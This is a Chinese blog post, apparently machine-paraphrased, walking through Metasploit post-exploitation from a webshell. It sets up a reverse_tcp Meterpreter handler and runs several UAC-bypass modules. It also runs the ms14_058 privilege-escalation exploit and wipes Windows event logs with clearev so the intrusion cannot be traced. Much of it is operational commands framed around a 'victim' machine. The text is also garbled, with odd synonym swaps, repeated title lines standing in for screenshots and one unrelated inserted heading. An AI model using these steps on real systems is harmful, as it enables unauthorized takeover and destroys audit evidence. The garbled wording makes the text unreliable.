metaspolit下UAC提权以及日志清除

在获得webshell时但权限不够大,这时候为了完全获得受害者机械的权限,使用msf举行后渗透。

一、获取Meterpreter会话

Meterpreter 是msf的一个payload,目的执行之后,我们会获得一个会话,和常见的shell会话类似,然则它的功效加倍壮大,它是执行后渗透测试的实行通道。

(1) 使用msfvenom天生payload

常用下令:
metaspolit下UAC提权以及日志清除

(2)内陆监听

监听需要用到msf的exploit/multi/handler模块,使用show options查看需要设置的参数。主要的参数有三个:监听使用的payload、内陆ip、内陆监听端口。这些参数的值跟之前msfvenom使用的参数一样。
Msfconsole 打开Metaploit
metaspolit下UAC提权以及日志清除

msf>use exploit/multi/handler

metaspolit下UAC提权以及日志清除

set payload windows/meterpreter/reverse_tcp

metaspolit下UAC提权以及日志清除

set LHOST 192.168.204.129

metaspolit下UAC提权以及日志清除

NIO实践-HTTP交互实现暨简版Tomcat交互内核

(3)将天生的payload通过webshell上传到服务器,要上传到可读写的区域并执行

metaspolit下UAC提权以及日志清除
乐成监听获得meterpreter(一个session(会话))
metaspolit下UAC提权以及日志清除
Getuid 查看主机名
metaspolit下UAC提权以及日志清除
也可以输入shell酿成下令行模式,输入exit返回到meterpeter shell模式
metaspolit下UAC提权以及日志清除
metaspolit下UAC提权以及日志清除
输入background下令让当前会话保存到后台
metaspolit下UAC提权以及日志清除
使用sessions下令可以查看所有后台的会话,每个session对应一个id值,后面会经常用到。
metaspolit下UAC提权以及日志清除

(4)Exploit 举行提权(UAC提权)

用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种平安机制,有助于防止对系统举行未经授权的更改。应用程序和义务可始终在非管理员帐户的平安上下文中运行,除非管理员专门给系统授予管理员级别的接见权限。UAC 可以阻止未经授权的应用程序举行自动安装,并防止无意中更改系统设置。
msf提供了bypassuac模块辅助绕过UAC:
metaspolit下UAC提权以及日志清除
在使用bypassuac模块举行提权时,当前用户必须在管理员组中,且UAC必须为默认设置(既“仅在程序试图更改我的盘算机时通知我”),bypassuac模块运行时,会在目的机械上建立多个文件,这些文件很有可能会被杀毒软件识别。

bypassuac模块先容

use exploit/windows/local/bypassuac #该模块运行时会由于在目的机上建立多个文件而被杀毒软件识别,因此通过该模块提权乐成率很低。
use exploit/windows/local/bypassuac_injection #该模块直接运行在内存的反射DLL中,以是不会接触目的机械的硬盘,从而降低了被杀毒软件检测出来的概率
use exploit/windows/local/bypassuac_fodhelper # 该模块通过在当前用户设置单元下挟制注册表中的特殊键,并插入将在启动Windows fodhelper.exe应用程序时挪用的自定义下令来绕过Windows 10 UAC
use exploit/windows/local/bypassuac_eventvwr #该模块通过在当前用户设置单元下挟制注册表中的特殊键,并插入将在启动Windows fodhelper.exe应用程序时挪用的自定义下令来绕过Windows 10 UAC
use exploit/windows/local/bypassuac_comhijack #此模块将通过在HKCU设置单元中,建立COM处置程序注册表项来绕过Windows UAC。当加载某些高完整性历程时将会引用这些注册表项,从而导致历程加载用户控制的DLL。这些DLL中包含了可提升权限的payload。该模块需要通过目的系统上的cmd.exe来挪用目的二进制文件,因此若是限制cmd.exe接见,则此模块将无法正常运行。
use exploit/windows/local/bypassuac_windows_store #通过模拟可信目录绕过UAC
use exploit/windows/local/bypassuac_sdclt #Sdclt用于Windows备份和还原机制的上下文中

1.第一次实验三个模块都无法获得权限

由于webshell权限只是user,这需要权限在adminisartor组中
metaspolit下UAC提权以及日志清除
metaspolit下UAC提权以及日志清除
metaspolit下UAC提权以及日志清除
bypassuac 执行乐成后会返回一个新的 meterpreter,此时再输入 shell 进入系统 cmd 查看权限,权限级别已经由 medium 酿成了 high。
除此之外另有许多其他的提权剧本,可以凭据 systeminfo 查出来的补丁和提权剧本做对比,若相关的行使剧本没有安装响应的补丁,则可针对性的举行提权操作。
这里用bypassuac_injection乐成提权
metaspolit下UAC提权以及日志清除
然则对新版的的win10没有一个可以乐成绕过。

2.也可以实验使用windwos的破绽举行提权,可以用metaspolit的内置模块

use post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester

set session id #id是已经获得的session号
当我们用它来探测某一个系统时,他会告诉我们该系统有哪些exploit可能可以行使

use post/multi/recon/local_exploit_suggester

metaspolit下UAC提权以及日志清除
详细行使在另一篇文章
发现可能的破绽后可以找到对应exp的模块:
如ms13_053,ms14_058,ms16_016,ms16_032等。下面以ms14_058为例。

msf5 > use exploit/windows/local/ms14_058_track_popup_menu
msf5 > exploit(ms14_058_track_popup_menu) > set session 1
msf5 > exploit(ms14_058_track_popup_menu) > exploit

metaspolit下UAC提权以及日志清除

日志消灭

消灭日志
再进入肉鸡执行一些操作时,windows 下纪录的操作日志可在日志查看器中举行查看,可以通过运行 eventvwr 下令打开。
包罗了应用程序、系统、平安等模块的日志,为了不让其查到自己或知道自己的操作,则可以使用 meterpreter 的 clearev 下令来消灭其日志。
未消灭日志前可查看系统纪录的一些处置信息。
metaspolit下UAC提权以及日志清除
然后在 meterpreter 下执行 clearev 下令,可以看到消灭提醒,划分消灭了应用程序,系统和平安模块的日志纪录。
metaspolit下UAC提权以及日志清除
下令运行后,再到靶机的日志查看器中查看,日志已经被消灭。
metaspolit下UAC提权以及日志清除

原创文章,作者:admin,如若转载,请注明出处:https://www.2lxm.com/archives/23702.html